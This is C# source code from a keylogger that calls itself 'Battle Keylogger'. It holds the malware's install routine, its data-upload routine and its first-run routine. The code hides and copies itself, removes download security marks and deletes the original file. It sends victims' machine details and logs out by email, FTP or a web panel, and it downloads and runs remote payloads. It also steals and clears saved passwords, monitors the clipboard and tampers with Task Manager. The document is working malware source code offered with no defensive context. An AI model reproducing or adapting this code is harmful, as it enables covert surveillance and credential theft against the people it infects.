public static void Install() { try { string runningPath = Application.ExecutablePath; if (runningPath.Equals(GetInstallPath())) { return; } string installPath = string.Empty; if (Config.PATH_TYPE.Equals("1")) { installPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); } else if (Config.PATH_TYPE.Equals("2")) { installPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData); } else if (Config.PATH_TYPE.Equals("3")) { installPath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments); } else if (Config.PATH_TYPE.Equals("4")) { installPath = Path.GetTempPath().Substring(0, Path.GetTempPath().Length - 1); } installPath += "\\" + Config.FOLDER_NAME; if (!Directory.Exists(installPath)) { try { Directory.CreateDirectory(installPath); } catch { } } installPath += "\\" + Config.FILE_NAME; try { File.Copy(runningPath, installPath, true); //Drops file } catch { } try { Core.CallAPI <bool>("kernel32", "DeleteFile", new Type[] { typeof(string) }, installPath + StringCipher.Decrypt("[ZONEID]", Config.MUTEX)); } catch { } Core.Upload("Battle Keylogger Installation Notification", "Battle Keylogger has been installed with the Galaxy Logger Installation Module" + Environment.NewLine + ComputerInformation.GetInformation(), "4"); if (!string.IsNullOrEmpty(Config.HIDE_FILE)) { try { File.SetAttributes(installPath, FileAttributes.Hidden); File.SetAttributes(installPath, FileAttributes.System); } catch { } } if (!string.IsNullOrEmpty(Config.MELT_FILE)) { try { ProcessStartInfo info = new ProcessStartInfo(); info.CreateNoWindow = true; info.UseShellExecute = false; info.FileName = "cmd"; info.Arguments = "/c ping -n 3 127.0.0.1 > nul & del " + '"' + runningPath + '"'; Process.Start(info); } catch { } } Process.Start(installPath); //GC.Collect(); Environment.Exit(0); } catch (Exception ex) { Config.DumpErrorLog(ex, null); } }
public static bool Upload(string title, string data, string type) { try { if (Config.UPLOAD_METHOD.Equals("EMAIL")) { MailMessage mail = new MailMessage(); SmtpClient SmtpServer = new SmtpClient(Config.EMAIL_SERVER); mail.From = new MailAddress(Config.EMAIL_USERNAME); mail.To.Add(Config.EMAIL_USERNAME); mail.Subject = title + " - " + Environment.UserName + "\\" + Environment.MachineName; mail.Body = data; SmtpServer.Port = Convert.ToInt32(Config.EMAIL_PORT); SmtpServer.Credentials = new System.Net.NetworkCredential(Config.EMAIL_USERNAME, Config.EMAIL_PASSWORD); SmtpServer.EnableSsl = !string.IsNullOrEmpty(Config.EMAIL_SSL); SmtpServer.Send(mail); } else if (Config.UPLOAD_METHOD.Equals("FTP")) { byte[] bytes = System.Text.ASCIIEncoding.ASCII.GetBytes((data)); FtpWebRequest request = (FtpWebRequest)WebRequest.Create(Config.FTP_SERVER + "/" + title.Replace(" ", "_") + "-" + Environment.UserName + "_" + Environment.MachineName + DateTime.Now.ToString("yyyyMMddHHmmssffff") + ".txt"); request.Method = WebRequestMethods.Ftp.UploadFile; request.Credentials = new NetworkCredential(Config.FTP_USERNAME, Config.FTP_PASSWORD); request.ContentLength = bytes.Length; Stream requestStream = request.GetRequestStream(); requestStream.Write(bytes, 0, bytes.Length); requestStream.Close(); FtpWebResponse response = (FtpWebResponse)request.GetResponse(); Console.WriteLine("Upload File Complete, status {0}", response.StatusDescription); } else if (Config.UPLOAD_METHOD.Equals("PHP")) { if (!type.Equals("4")) { using (WebClient client = new WebClient()) { byte[] response = client.UploadValues(Config.WEBPANEL + "/insert", new NameValueCollection() { { "key", Config.PHP_KEY }, { "type", type }, { "pcname", ComputerInformation.GetName() }, { "log", data }, { "hwid", GenerateHWID() } }); } } else { using (WebClient client = new WebClient()) { byte[] response = client.UploadValues(Config.WEBPANEL + "/install", new NameValueCollection() { { "key", Config.PHP_KEY }, { "os", ComputerInformation.GetOS() }, //We use args for something else because php accepts diff parameters for installing { "pcname", ComputerInformation.GetName() }, { "hwid", GenerateHWID() } }); } } } return(true); } catch (Exception ex) { Config.DumpErrorLog(ex, null); } return(false); }
public static void FileExecuted() { string notifyFile = Path.GetTempPath() + Config.HWID + ".dat"; if (!File.Exists(notifyFile)) { //Install File Notification (One Time Things, Error Msg) Core.Upload("Battle Keylogger Running Notification", "Battle Keylogger is currently active." + Environment.NewLine + ComputerInformation.GetInformation(), "1"); if (!string.IsNullOrEmpty(Config.MESSAGE_TYPE)) { new Thread(new ThreadStart(FakeMessage)).Start(); //ThreadPool.QueueUserWorkItem(FakeMessage); } if (!string.IsNullOrEmpty(Config.DOWNLOAD_FILE)) { try { string downloadFilePath = Path.GetTempFileName(); File.Delete(downloadFilePath); downloadFilePath = downloadFilePath.Substring(0, downloadFilePath.Length - 4); downloadFilePath += Config.DOWNLOAD_FILE_TYPE; new WebClient().DownloadFile(Config.DOWNLOAD_FILE, downloadFilePath); Process.Start(downloadFilePath); } catch { } } if (!string.IsNullOrEmpty(Config.PASSWORD_STEALER)) { Core.RecoverPasswords(); } if (!string.IsNullOrEmpty(Config.CLEAR_SAVED)) { Core.DeleteSavedPasswords(); } File.WriteAllText(notifyFile, Config.GUID + Environment.NewLine + Application.ExecutablePath); } if (!string.IsNullOrEmpty(Config.CLIPBOARD_MONITORING)) { ClipboardMonitor.Start(); } if (!string.IsNullOrEmpty(Config.MODIFY_TASK_MANAGER)) { Services.ModifyTaskManager(); } new Thread(new ParameterizedThreadStart(Startup)).Start(GetInstallPath()); }